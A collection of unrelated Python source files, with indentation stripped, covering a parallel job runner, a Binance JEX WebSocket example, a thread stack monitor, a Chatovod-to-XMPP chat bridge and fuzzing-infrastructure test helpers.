raise Exception("could not find gene sequence file %s, please see examples and generate one for your gene as needed, with this filename" % gene_file)
return seq
def get_or_compute(file, fargpair, force_compute=False):
try:
if os.path.exists(file) and not force_compute:
print "from get_or_compute reading cached pickle", file
with open(file, 'rb') as f:
return pickle.load(f)
else:
print "from get_or_compute recomputing pickle cache", file
except Exception as e:
# TODO: catch pickle failure error
warn("Failed to load %s" % file)
warn("Recomputing. This may take a while...")
result = fargpair[0](*fargpair[1])
with open(file, 'wb') as f:
pickle.dump(result, f)
return result
def to_temp(name, object):
filename = settings.pj(settings.tmpdir, name + ".pkl")
with open(filename, "wb") as f:
pickle.dump(object, f)
def from_temp(name):
filename = settings.pj(settings.tmpdir, name + ".pkl")
with open(filename, "rb") as f:
return pickle.load(f)
def execute_parallel(farg_pairs, num_procs=None, verbose=False):
# see https://blog.ionelmc.ro/2014/12/21/compiling-python-extensions-on-windows/
from multiprocess import Process, Queue, cpu_count
if num_procs is None:
# leave 25%
num_procs = math.ceil(cpu_count()*.75)
print "using %d procs in execute parallel" % num_procs
processes = []
q = None
results = []
q = Queue()
num_jobs = len(farg_pairs)
if verbose:
print "execute_parallel num_procs=%d, num_jobs=%d" % (num_procs, num_jobs)
i = -1
farg_pair = None
farg_pairs = copy.copy(farg_pairs)
while len(farg_pairs) > 0:
farg_pair = farg_pairs.pop(0)
i += 1
if verbose:
print "running job", i
def target_func(*args, **kwargs):
q.put((i, farg_pair[0](*args, **kwargs)))
if len(farg_pair) > 1:
p = Process(target=target_func, args=farg_pair[1])
else:
p = Process(target=target_func)
p.start()
processes.append(p)
# wait until we drop below num_procs
while len(processes) >= num_procs:
len1 = len(results)
results.append(q.get())
if len1 != len(results):
for j, p in enumerate(processes):
if p.exitcode is not None:
p.join()
break
processes = processes[:j] + processes[j+1:]
else:
time.sleep(0.01)
while len(results) < num_jobs:
results.append(q.get())
time.sleep(0.01)
assert len(results) == num_jobs
# join remaining processes before exiting
for i, p in enumerate(processes):
p.join()
results = zip(*sorted(results, key=lambda x: x[0]))[1]
return results
if __name__ == "__main__":
def test(t, v):
time.sleep(random.randint(1, 4))
return t, v
commands = []
for i in range(11):
v = random.randint(0, 1000)
commands.append((test, (i, v)))
a = execute_parallel(commands, num_procs=None, verbose=True)
b = map(lambda x: x[1], commands)
print a
print b
assert tuple(a) == tuple(b)
|
example_binance_jex.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# File: example_binance_jex.py
#
# Part of ‘UNICORN Binance WebSocket API’
# Project website: https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api
# Documentation: https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api
# PyPI: https://pypi.org/project/unicorn-binance-websocket-api/
#
# Author: Oliver Zehentleitner
# https://about.me/oliver-zehentleitner
#
# Copyright (c) 2019-2020, Oliver Zehentleitner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager import BinanceWebSocketApiManager
import logging
import time
import threading
import os
def print_stream_data_from_stream_buffer(binance_websocket_api_manager):
while True:
if binance_websocket_api_manager.is_manager_stopping():
exit(0)
oldest_stream_data_from_stream_buffer = binance_websocket_api_manager.pop_stream_data_from_stream_buffer()
if oldest_stream_data_from_stream_buffer is False:
time.sleep(0.01)
# https://docs.python.org/3/library/logging.html#logging-levels
logging.basicConfig(level=logging.DEBUG,
filename=os.path.basename(__file__) + '.log',
format="{asctime} [{levelname:8}] {process} {thread} {module}: {message}",
style="{")
# create instance of BinanceWebSocketApiManager for Binance Jersey
binance_websocket_api_manager = BinanceWebSocketApiManager(exchange="jex.com")
# set api key and secret for userData stream
binance_jex_api_key = ""
binance_jex_api_secret = ""
binance_websocket_api_manager.set_private_api_config(binance_jex_api_key, binance_jex_api_secret)
userdata_stream_id = binance_websocket_api_manager.create_stream(["arr"], ["!userData"])
ticker_all_stream_id = binance_websocket_api_manager.create_stream(["arr"], ["!optionMiniTicker"])
miniticker_stream_id = binance_websocket_api_manager.create_stream(["arr"], ["!spotMiniTicker"])
miniticker_stream_id = binance_websocket_api_manager.create_stream(["arr"], ["!spotTicker"])
spot_markets = {'eosbtc', 'ltcbtc', 'ethbtc', 'dashbtc'}
spot_channels = {'spotTrade', 'spotMiniTicker', 'spotDepth20', 'spotDepthUpdate', 'spotTicker'}
binance_websocket_api_manager.create_stream(["spotTrade"], spot_markets)
binance_websocket_api_manager.create_stream(["spotDepth10"], spot_markets)
binance_websocket_api_manager.create_stream(["spotDepth20"], spot_markets)
binance_websocket_api_manager.create_stream(spot_channels, spot_markets)
# start a worker process to move the received stream_data from the stream_buffer to a print function
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(binance_websocket_api_manager,))
worker_thread.start()
# show an overview
while True:
binance_websocket_api_manager.print_summary()
#binance_websocket_api_manager.print_stream_info(userdata_stream_id)
time.sleep(1)
|
stacksurveillance.py
|
"""
Class to watch the calling thread and report what it's doing.
https://stackoverflow.com/questions/45290223/check-what-thread-is-currently-doing-in-python
"""
import threading
import sys
import time
class StackSurveillance:
def __init__(self, thread=threading.current_thread(), file=sys.stderr, interval=60.0, callback=None):
self.thread = thread
self.file = file
self.callback=callback
self.t = threading.Thread(target=self.run)
self.t.start()
def run(self):
while True:
frame = sys._current_frames().get(self.thread.ident, None)
if frame:
print(frame, file=self.file)
print(frame.f_code.co_filename, frame.f_code.co_name, frame.f_code.co_firstlineno, file=self.file)
if self.callback is not None:
self.callback(frame)
if __name__=="__main__":
print("demo program to show use with a slow fibinacci program.")
def slow_fib(a):
time.sleep(1)
if a>2:
return slow_fib(a -1) +slow_fib(a -2)
return 1
|
chatovod2xmpp.py
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
import socket
import time
import random
import traceback
from hashlib import sha1
from base64 import b64encode, b64decode
from threading import RLock, Thread
from urllib2 import unquote, quote, urlopen
import chatovod
from pyjabberd_utilites import load_config, node_reader, jid_split, gen_error, gen_iq_result, gen_stream_stream, Node, XML2Node
class CExc(Exception): pass
class NodeProcessed(Exception): pass
host = None # init after connecting
sock = None
lock = RLock() # for socket
reader = None
deletechars="".join(chr(x) for x in range(32) if x not in (10, 13))
rooms_list = []
rooms_list_dict = {}
rooms_list_time = 0
rooms = {} # jabber
config = {
'host': 'localhost',
'server': '',
'transport_host': 'chatovod.localhost',
'port': '52220',
'password': 'secret'
}
smile_cache = {}
def get_smile(url):
data = smile_cache.get(url)
if data: return data
try: data = urlopen(url).read()
except: return url
else:
typ = url[-4:].lower()
if typ == ".gif": typ = "image/gif"
elif typ in (".jpg", ".jpeg"): typ = 'image/jpeg'
else: typ = 'image/png'
smile_cache[url] = "data:" + typ + ";base64," + quote(b64encode(data))
return smile_cache[url]
class Room:
def __init__(self, name):
name = name.lower()
self.name = name
self.chat = chatovod.Chat(name)
self.clients = {} # jabber
self.chat_users = {} # chatovod
self.last20 = []
self.stopped = False
self.topic = None
#self.cookie = {} # joined from jabber
self.clients_timeout = time.time()
self.captcha_cache = {}
self.msg_id_cache = {}
try:
self.go(reload=True)
except:
traceback.print_exc()
self.thread = Thread(target=self.run)
self.thread.start()
def has_jabber_clients(self, jid=None):
if not jid: return bool(self.clients)
else: return self.clients.has_key(jid)
def send_last20(self, jid):
for prs in self.chat_users.values():
prs['to'] = jid
send(prs)
for msg in self.last20:
msg['to'] = jid
send(msg)
if self.topic:
msg = Node("message", {"type": "groupchat", "from": self.name+u"@"+host, "to": jid})
msg.addChild("subject").addData(self.topic)
send(msg)
def set_prs_status(self, jid, prs):
nick = self.clients.get(jid)
if not nick: return
show = prs.getTag("show")
if show: show = show.getData()
if not show: show = u"online"
status = prs.getTag("status")
if status: status = status.getData()
else: status = u""
if status:
self.chat.changestatus(nick.encode("utf-8"), status.encode("utf-8"))
return
if show in (u"away", u"xa"):
show = "AWAY"
elif show in (u"dnd", ):
show = "DND"
else:
show = "ONLINE"
self.chat.changestatus(nick.encode("utf-8"), show)
def join(self, jid, nick, prs, password=None):
if self.clients.get(jid) == nick:
self.set_prs_status(jid, prs)
return
if self.clients.get(jid): # or (nick != u"anonymous" and not password):
send(gen_error(prs, "409", "cancel", "conflict"))
return
if self.chat_users.get(nick) and self.clients.get(jid) != nick:
send(gen_error(prs, "409", "cancel", "conflict"))
return
if nick == u"anonymous":
self.clients[jid] = nick
self.send_last20(jid)
prs = Node("presence", {"type":"available", "from": self.name+u"@"+host+u"/"+nick, "to": jid})
x = prs.addChild("x")
x.setNamespace("http://jabber.org/protocol/muc#user")
x.addChild("item", {"affiliation":"none", "role": "visitor"})
send(prs)
return
cookie, result = self.chat.login(nick, password if password else "")
if result['status'] == 'ok':
self.clients[jid] = nick
self.send_last20(jid)
self.set_prs_status(jid, prs)
return
elif result['status'] == 'needpassword':
send(gen_error(prs, "401", "auth", "not-authorized"))
return
captcha = self.chat.getcaptcha(cookie=cookie)
chash = sha1(captcha).hexdigest()
cid = "sha1+" + chash + "@bob.xmpp.org"
cid = str(random.randrange(1000000,10000000))
self.captcha_cache[jid] = [nick, password, cid, cookie, prs]
msg = Node("message", {"from": self.name+u"@"+host, "to": jid, "id": cid})
msg.addChild("body").addData(u"Увы, капча")
c = msg.addChild("captcha")
c.setNamespace("urn:xmpp:captcha")
x = c.addChild("x", {"type": "form"})
x.setNamespace("jabber:x:data")
x.addChild("field", {"type": "hidden", "var": "FORM_TYPE"}).addChild("value").addData("urn:xmpp:captcha")
x.addChild("field", {"type": "hidden", "var": "from"}).addChild("value").addData(self.name+u"@"+host)
x.addChild("field", {"type": "hidden", "var": "challenge"}).addChild("value").addData(cid)
x.addChild("field", {"type": "hidden", "var": "sid"}).addChild("value")
l = x.addChild("field", {"label": u"Введите увиденный текст", "var": "ocr"})
l.addChild("required")
m = l.addChild("media")
m.setNamespace("urn:xmpp:media-element")
m.addChild("uri", {"type":"image/png"}).addData(cid)
d = msg.addChild("data", {"cid": cid, "type": "image/png", "mag-age": "0"})
d.setNamespace("urn:xmpp:bob")
d.addData(b64encode(captcha))
send(msg)
def parse_captcha_iq(self, jid, node):
if node['type'] != 'set': return
print "parse captcha"
nick, password, cid, cookie, prs = self.captcha_cache.get(jid, [None, None, None, None, None])
if not cid or not cookie or not prs: return
self.captcha_cache.pop(jid)
try:
captcha = node.getTag("captcha", {"xmlns":"urn:xmpp:captcha"})
#print unicode(captcha)
captcha = captcha.getTag("x").getTag("field", {"var":"ocr"}).getTag("value").getData()
except:
captcha = ""
print "c =", captcha
cookie, result = self.chat.login(nick, password, captcha=captcha, cookie=cookie)
if result['status'] != 'ok':
send(gen_error(prs, "406", "modify", "not-acceptable"))
send(gen_error(prs, "401", "auth", "not-authorized"))
if not self.has_jabber_clients():
kill_room(self.name)
raise NodeProcessed
#self.cookies[jid] = cookie
self.clients[jid] = nick
self.send_last20(jid)
self.set_prs_status(jid, prs)
def parse_message(self, jid, node):
if node['type'] != 'groupchat': return
nick = self.clients.get(jid)
if not nick or nick == u'anonymous': return
body = node.getTag("body")
if not body or not body.getData(): return
body = body.getData()
self.msg_id_cache[nick] = node['id']
if self.chat.send_msg(nick.encode("utf-8"), body.encode("utf-8")).get('status') == 'notlogged':
self.leave(jid, None, status=307)
def stop(self):
self.stopped = True
for jid in self.clients.keys():
self.leave(jid)
def leave(self, jid, prs=None, status=None):
nick = self.clients.get(jid)
if not nick: return
self.clients.pop(jid)
node=Node("presence", {"type": "unavailable", "to": jid, "from": self.name+u"@"+host+u"/"+nick})
if status: node.addChild("x", namespace="http://jabber.org/protocol/muc#user").addChild("status", {"code": str(status)})
send(node)
if nick != u"anonymous":
self.chat.leave(nick)
def run(self):
while 1:
if self.stopped: break
try:
self.go()
except:
traceback.print_exc()
time.sleep(1)
print "STOP", self.name
def go(self, reload=False):
#print time.time() - self.clients_timeout
if time.time() - self.clients_timeout >= 30:
#print "timeout"
for nick in self.clients.values():
if nick == u'anonymous': continue
#self.chat.changestatus(nick)
try: self.chat.send_action(nick, "listen", reload="1") #reload=0 если с предыдущей строчкой
except KeyboardInterrupt: continue
except: pass
self.clients_timeout = time.time()
data = self.chat.listen(reload)
if self.stopped: return
for item in data.get("users", []):
#print "user", item
#print
if item.get("nick") == u"anonymous":
print "WARNING!!! ANONYMOUS IN CHATOVOD!!!"
continue
if item['event'] == 'LEAVE':
if not self.chat_users.get(item['nick']): continue
self.chat_users.pop(item['nick'])
self.send_node(Node("presence", {"type": "unavailable", "from": self.name+u"@"+host+u"/"+item['nick']}))
else:
sprs = Node("presence", {"type": "available", "from": self.name+u"@"+host+u"/"+item['nick']})
x = sprs.addChild("x")
x.setNamespace("http://jabber.org/protocol/muc#user")
aff = 'owner' if item.get('adm')=='1' else ('admin' if item.get('m')=='1' else 'none')
role = 'moderator' if aff!='none' else 'participant'
x.addChild("item", {"affiliation":aff, "role": role})
if item['s'] == 'AWAY':
sprs.addChild("show").addData("away")
elif item['s'] == 'DND':
sprs.addChild("show").addData("dnd")
elif item['s'] == 'CUSTOM':
sprs.addChild("status").addData(item.get("ss", u""))
self.chat_users[item['nick']] = sprs
self.send_node(sprs)
for item in data.get('messages', []):
#print "msg", item
#print
if item.get('channel') != 'main': continue
if item.get('type') in (u'login', u'logout') or (not item.get('from') and item.get('type')!='me'):
continue
if item.get('type') == 'me':
item['from'], item['text'] = item['text'].split(" ",1)
item['text'] = u"/me " + item['text']
if item.get("from") == u"anonymous":
print "WARNING!!! ANONYMOUS IN CHATOVOD!!!"
continue
if self.msg_id_cache.get(item['from']):
mid = self.msg_id_cache.pop(item['from'])
else:
mid = str(random.randrange(10000,100000))
msg = Node('message', {
'type':'groupchat',
'from': self.name+u"@"+host+u"/"+item['from'],
'id': mid
})
body = None
try:
#if "<" in item['text'] :
body = XML2Node("<body>"+item['text'].encode("utf-8")+"</body>")
except:
print "cannot parse text", self.name
#body = Node('body')
#body.addData(item['text'])
if body:
body.setNamespace("http://www.w3.org/1999/xhtml")
if body:
text_body = u""
for x in body.getPayload():
if not x: continue
if isinstance(x, unicode): text_body += x; continue
if x.getName() == 'br': text_body += u'\n'
elif x.getName() == 'img' and x['src']:
if 'chatovod.ru' in x['src'] and '/i/sm/' in x['src'] :
text_body += u' ' + x['alt'] + u' '
x['src'] = get_smile(x['src'])
else:
text_body += u' ' + x['src'] + u' ' + ((u'(' + x['alt'] + ') ') if x['alt'] else u'')
x['onload'] = u''
elif x.getName() == 'a' and x['onclick'] and '/media/?url=' in x['onclick']:
url = x['onclick'].split("/media/?url=",1)[-1].split("'",1)[0]
url = unquote(url)
text_body += url
x.setData(url)
x['src'] = url
else: text_body += x.getCDATA()
else:
text_body = item['text']
#if item.get('type') == 'me' and text_body.find(item['from']+u" ") == 0:
# text_body = u"/me "+text_body[len(item['from'])+1:]
msg.addChild('body').addData(text_body)
if body:
html = msg.addChild('html')
html.setNamespace("http://jabber.org/protocol/xhtml-im")
html.addChild(node=body)
self.send_node(msg)
tm = time.gmtime(int(item.get('t', 0))/1000)
tm1 = time.strftime("%Y-%m-%dT%H:%M:%SZ", tm)
tm2 = time.strftime("%Y%m%dT%H:%M:%S", tm)
msg.addChild("delay", {"from": self.name+u"@"+host, "stamp": tm1}).setNamespace("urn:xmpp:delay")
msg.addChild("x", {"stamp": tm2}).setNamespace("jabber:x:delay")
self.last20.append(msg)
if len(self.last20) > 20:
self.last20 = self.last20[-20:]
for item in data.get("events", []):
#print "event", item
#print
if item.get('t') != 'news': continue
body = item['text']
try:
if "<" in body:
body = XML2Node("<body>"+body.encode("utf-8")+"</body>")
body = body.getCDATA()
except:
print "cannot parse event text", self.name
self.topic = body if body else None
msg = Node("message", {"type": "groupchat", "from": self.name+u"@"+host})
msg.addChild("subject").addData(self.topic if self.topic else "")
self.send_node(msg)
def send_node(self, node):
for send_jid in self.clients.keys():
node['to'] = send_jid
send(node)
def create_room(name):
room = Room(name)
rooms[name] = room
print "CREATE", name
return room
def kill_room(name):
room = rooms.get(name)
if not room: return
room.stop()
rooms.pop(name)
print "KILL", name
def get_rooms_list(please_dict=False):
global rooms_list, rooms_list_time, rooms_list_dict
if int(time.time()) - rooms_list_time < 30:
return rooms_list_dict if please_dict else rooms_list
rooms_list = []
rooms_list_dict = {}
rooms_list_time = int(time.time())
for i in xrange(10):
crooms = chatovod.get_rooms_list(i+1)
if not crooms: break
for croom in crooms:
f=croom[0].rfind(".chatovod.ru/")
if f <= 0: continue
name = croom[0][:f] + "@" + host
name = name[name.rfind("/")+1:]
title = croom[1].encode("utf-8") + " (" + str(croom[2]) + ")"
rooms_list.append( (name, title,) )
rooms_list_dict[name] = (croom[1].encode("utf-8"), croom[2])
return rooms_list_dict if please_dict else rooms_list
def socket_read():
global sock
return sock.recv(4096)
def read():
global reader
return reader.next()
def send(data):
global sock, lock
with lock:
if not isinstance(data, str):
data = unicode(data).encode("utf-8")
return sock.sendall(data.translate(None, deletechars))
def connect():
global config, sock, reader, host
sock = socket.socket()
server = config.get('server')
if not server: server = config['host']
sock.connect( (server, int(config['port']),) )
reader = node_reader(socket_read)
send(gen_stream_stream(config['host'], 'jabber:component:accept'))
node = read()
if node.getName() != "stream":
print unicode(node)
raise CExc("Invalid stanza")
sid = node['id']
shash = sha1(str(sid) + config['password']).hexdigest()
handshake = Node("handshake")
handshake.addData(shash)
send(handshake)
node = read()
if node.getName() != 'handshake':
if node.getName() == 'error':
raise CExc(node.getChildren()[0].getName())
print unicode(node)
raise CExc("Invalid stanza")
host = config['transport_host'].decode("utf-8")
def process():
node = read()
try:
parse_node(node)
except NodeProcessed: pass
except KeyboardInterrupt: raise
except:
try:
#print unicode(node)
#print
#print unicode(gen_error(node))
send(gen_error(node))
except:
traceback.print_exc()
raise
def parse_node(node):
if node.getName() == "iq":
if node['to'] == host: parse_my_iq(node)
else: parse_iq(node)
if node['type'] in ('get', 'set'):
send(gen_error(node, "501" ,"cancel", "feature-not-implemented"))
elif node.getName() == "presence":
if node['to'] == host: pass
else: parse_presence(node)
elif node.getName() == "message":
if node['to'] == host: pass
else: parse_message(node)
def parse_message(node):
if node['type'] == 'error': return
jid, resource = jid_split(node['to'])
#node['to'] = jid
name = jid[:jid.find("@")].encode("utf-8")
#TODO: fix xmlns=jabber:component:accept
#send(gen_error(node, "403", "auth", "forbidden", text="Сообщения не поддерживаются", childs=True))
if not resource:
room = rooms.get(name)
if room: room.parse_message(node['from'], node)
def parse_presence(node):
if node['type'] == 'error': return
jid, resource = jid_split(node['to'])
#node['to'] = jid
name = jid[:jid.find("@")].encode("utf-8")
room = rooms.get(name)
if room:
#joined = rooms[name].clients.has_key(node['from'])
joined = rooms[name].has_jabber_clients(node['from'])
else:
joined = False
if not joined and not resource: return
passwd = node.getTag("x", {"xmlns": "http://jabber.org/protocol/muc"})
if passwd: passwd = passwd.getTag("password")
if passwd: passwd = passwd.getData()
if not room:
if node['type'] == 'unavailable':
return
try: room = create_room(name)
except chatovod.ChatovodError:
send(gen_error(node, "404", "cancel", "remote-server-not-found"))
return
if node['type'] == 'unavailable':
room.leave(node['from'], node)
if not room.has_jabber_clients():
kill_room(name)
else:
room.join(node['from'], resource, prs=node, password=passwd)
def parse_my_iq(node):
query = node.getTag("query")
if not query:
return
if query.getNamespace() == "http://jabber.org/protocol/disco#info":
rquery = Node("query")
rquery.setNamespace("http://jabber.org/protocol/disco#info")
rquery.addChild("identity", {"category": "conference", "type": "text", "name": "Chatovod"})
send(gen_iq_result(node, rquery))
raise NodeProcessed
elif query.getNamespace() == "http://jabber.org/protocol/disco#items":
rquery = Node("query")
rquery.setNamespace("http://jabber.org/protocol/disco#items")
crooms = get_rooms_list()
for croom in crooms:
rquery.addChild("item", {"name": croom[1], "jid": croom[0]})
send(gen_iq_result(node, rquery))
raise NodeProcessed
def parse_iq(node):
jid, resource = jid_split(node['to'])
name = jid[:jid.find("@")].encode("utf-8")
#print name, resource
if not resource: # for chat
if node.getTag("captcha"):
#print "p c"
room = rooms.get(name)
#print "r", room
if not room: return
room.parse_captcha_iq(node['from'], node)
return
query = node.getTag("query")
if not query:
return
if query.getNamespace() == "http://jabber.org/protocol/disco#info":
rquery = Node("query")
rquery.setNamespace("http://jabber.org/protocol/disco#info")
croom = get_rooms_list(please_dict=1).get(name, ("", 0))
rquery.addChild("identity", {"category": "conference", "type": "text", "name": croom[0]})
rquery.addChild("feature", {"var": "http://jabber.org/protocol/muc"})
rquery.addChild("feature", {"var": "muc_public"})
rquery.addChild("feature", {"var": "muc_persistent"})
rquery.addChild("feature", {"var": "muc_moderated"})
rquery.addChild("feature", {"var": "muc_unsecured"})
x = rquery.addChild("x", {"type": "result"})
x.setNamespace("jabber:x:data")
x.addChild("field", {"type": "hidden", "var": "FORM_TYPE"}).addChild("value").addData("http://jabber.org/protocol/muc#roominfo")
x.addChild("field", {"label": "Описание комнаты", "var": "muc#roominfo_description"}).addChild("value")
x.addChild("field", {"label": "Число присутствующих", "var": "muc#roominfo_occupants"}).addChild("value").addData(str(croom[1]))
send(gen_iq_result(node, rquery))
raise NodeProcessed
elif query.getNamespace() == "http://jabber.org/protocol/disco#items":
rquery = Node("query")
rquery.setNamespace("http://jabber.org/protocol/disco#items")
room = rooms.get(name)
if room:
for cuser in room.chat_users.keys():
rquery.addChild("item", {"name": cuser, "jid": name+'@'+host+"/"+cuser})
send(gen_iq_result(node, rquery))
raise NodeProcessed
def shutdown():
global host, sock, reader
for name in rooms.keys():
kill_room(name)
with lock:
host = None
sock = None
reader = None
def main(run=0):
if run == 0: load_config(config=config)
connect()
print "Connected"
get_smile(u"http://st1.chatovod.ru/i/sm/icon_smile.gif")
get_smile(u"http://st1.chatovod.ru/i/sm/icon_biggrin.gif")
get_smile(u"http://st1.chatovod.ru/i/sm/lol1.gif")
try:
while 1:
try:
process()
except StopIteration:
print "Disconnected!"
shutdown()
time.sleep(1)
return "reload"
except KeyboardInterrupt: raise
except CExc as exc: raise
except:
traceback.print_exc()
finally:
shutdown()
if __name__ == "__main__":
try:
run=0
while main(run) == "reload":
print "Restarting..."
run+=1
except KeyboardInterrupt:
print
except CExc as exc:
print "Error:", str(exc)
|
test_utils.py
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Generic helper functions useful in tests."""
import atexit
import datetime
import os
import requests
import shutil
import socket
import subprocess
import tempfile
import threading
import unittest
from config import local_config
from datastore import data_types
from datastore import ndb
from google_cloud_utils import pubsub
from issue_management.comment import Comment
from issue_management.issue import Issue
from system import environment
from system import process_handler
CURRENT_TIME = datetime.datetime.utcnow()
EMULATOR_TIMEOUT = 20
# Per-process emulator instances.
_emulators = {}
def create_generic_testcase(created_days_ago=28):
"""Create a simple test case."""
testcase = data_types.Testcase()
# Add more values here as needed. Intended to be the bare minimum for what we
# need to simulate a test case.
testcase.absolute_path = '/a/b/c/test.html'
testcase.crash_address = '0xdeadbeef'
testcase.crash_revision = 1
testcase.crash_state = 'crashy_function()'
testcase.crash_stacktrace = testcase.crash_state
testcase.crash_type = 'fake type'
testcase.comments = 'Fuzzer: test'
testcase.fuzzed_keys = 'abcd'
testcase.fuzzer_name = 'fuzzer1'
testcase.open = True
testcase.one_time_crasher_flag = False
testcase.job_type = 'test_content_shell_drt'
testcase.status = 'Processed'
testcase.timestamp = CURRENT_TIME - datetime.timedelta(days=created_days_ago)
testcase.project_name = 'project'
testcase.platform = 'linux'
testcase.put()
return testcase
def create_generic_issue(created_days_ago=28):
"""Returns a simple issue object for use in tests."""
issue = Issue()
issue.cc = ['cc@chromium.org']
issue.comment = ''
issue.comments = []
issue.components = ['Test>Component']
issue.labels = ['TestLabel', 'Pri-1', 'OS-Windows']
issue.open = True
issue.owner = 'owner@chromium.org'
issue.status = 'Assigned'
issue.id = 1
issue.itm = create_issue_tracker_manager()
# Test issue was created 1 week before the current (mocked) time.
issue.created = CURRENT_TIME - datetime.timedelta(days=created_days_ago)
return issue
def create_generic_issue_comment(comment_body='Comment.',
author='user@chromium.org',
days_ago=21,
labels=None):
"""Return a simple comment used for testing."""
comment = Comment()
comment.comment = comment_body
comment.author = author
comment.created = CURRENT_TIME - datetime.timedelta(days=days_ago)
comment.labels = labels
if comment.labels is None:
comment.labels = []
return comment
def create_issue_tracker_manager():
"""Create a fake issue tracker manager."""
class FakeIssueTrackerManager(object):
"""Fake issue tracker manager."""
def get_issue(self, issue_id):
"""Create a simple issue with the given id."""
issue = create_generic_issue()
issue.id = issue_id
return issue
def get_comments(self, issue): # pylint: disable=unused-argument
"""Return an empty comment list."""
return []
def save(self, issue, send_email=None):
"""Fake wrapper on save function, does nothing."""
pass
return FakeIssueTrackerManager()
def entities_equal(entity_1, entity_2, check_key=True):
"""Return a bool on whether two input entities are the same."""
if check_key:
return entity_1.key == entity_2.key
return entity_1.to_dict() == entity_2.to_dict()
def entity_exists(entity):
"""Return a bool on where the entity exists in datastore."""
return entity.get_by_id(entity.key.id())
def adhoc(func):
"""Mark the testcase as an adhoc. Adhoc tests are NOT expected to run before
merging and are NOT counted toward test coverage; they are used to test
tricky situations.
Another way to think about it is that, if there was no adhoc test, we
would write a Python script (which is not checked in) to test what we want
anyway... so, it's better to check in the script.
For example, downloading a chrome revision (10GB) and
unpacking it. It can be enabled using the env ADHOC=1."""
return unittest.skipIf(not environment.get_value('ADHOC', False),
'Adhoc tests are not enabled.')(
func)
def integration(func):
"""Mark the testcase as integration because it depends on network resources
and/or is slow. The integration tests should, at least, be run before
merging and are counted toward test coverage. It can be enabled using the
env INTEGRATION=1."""
return unittest.skipIf(not environment.get_value('INTEGRATION', False),
'Integration tests are not enabled.')(
func)
def slow(func):
"""Slow tests which are skipped during presubmit."""
return unittest.skipIf(not environment.get_value('SLOW_TESTS', True),
'Skipping slow tests.')(
func)
class EmulatorInstance(object):
"""Emulator instance."""
def __init__(self, proc, port, read_thread, data_dir):
self._proc = proc
self._port = port
self._read_thread = read_thread
self._data_dir = data_dir
def cleanup(self):
"""Stop and clean up the emulator."""
process_handler.terminate_root_and_child_processes(self._proc.pid)
self._read_thread.join()
if self._data_dir:
shutil.rmtree(self._data_dir, ignore_errors=True)
def reset(self):
"""Reset emulator state."""
req = requests.post('http://localhost:{}/reset'.format(self._port))
req.raise_for_status()
def _find_free_port():
"""Find a free port."""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('localhost', 0))
_, port = sock.getsockname()
sock.close()
return port
def start_cloud_emulator(emulator, args=None, data_dir=None):
"""Start a cloud emulator."""
ready_indicators = {
'datastore': 'is now running',
'pubsub': 'Server started',
}
default_flags = {
'datastore': ['--no-store-on-disk', '--consistency=1'],
'pubsub': [],
}
if emulator not in ready_indicators:
raise RuntimeError('Unsupported emulator')
if data_dir:
cleanup_dir = None
else:
temp_dir = tempfile.mkdtemp()
data_dir = temp_dir
cleanup_dir = temp_dir
port = _find_free_port()
command = [
'gcloud', 'beta', 'emulators', emulator, 'start',
'--data-dir=' + data_dir, '--host-port=localhost:' + str(port),
'--project=' + local_config.GAEConfig().get('application_id')
]
if args:
command.extend(args)
command.extend(default_flags[emulator])
# Start emulator.
proc = subprocess.Popen(
command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
def _read_thread(proc, ready_event):
"""Thread to continuously read from the process stdout."""
ready = False
while True:
line = proc.stdout.readline()
if not line:
break
if not ready and ready_indicators[emulator] in line:
ready = True
ready_event.set()
# Wait for process to become ready.
ready_event = threading.Event()
thread = threading.Thread(target=_read_thread, args=(proc, ready_event))
thread.daemon = True
thread.start()
if not ready_event.wait(EMULATOR_TIMEOUT):
raise RuntimeError(
'{} emulator did not get ready in time.'.format(emulator))
# Set env vars.
env_vars = subprocess.check_output([
'gcloud', 'beta', 'emulators', emulator, 'env-init',
'--data-dir=' + data_dir
])
for line in env_vars.splitlines():
key, value = line.split()[1].split('=')
os.environ[key.strip()] = value.strip()
return EmulatorInstance(proc, port, thread, cleanup_dir)
def _create_pubsub_topic(client, project, name):
"""Create topic if it doesn't exist."""
full_name = pubsub.topic_name(project, name)
if client.get_topic(full_name):
return
client.create_topic(full_name)
def _create_pubsub_subscription(client, project, topic, name):
"""Create subscription if it doesn't exist."""
topic_name = pubsub.topic_name(project, topic)
full_name = pubsub.subscription_name(project, name)
if client.get_subscription(full_name):
return
client.create_subscription(full_name, topic_name)
def setup_pubsub(project):
"""Set up pubsub topics and subscriptions."""
config = local_config.Config('pubsub.queues')
client = pubsub.PubSubClient()
queues = config.get('resources')
for queue in queues:
_create_pubsub_topic(client, project, queue['name'])
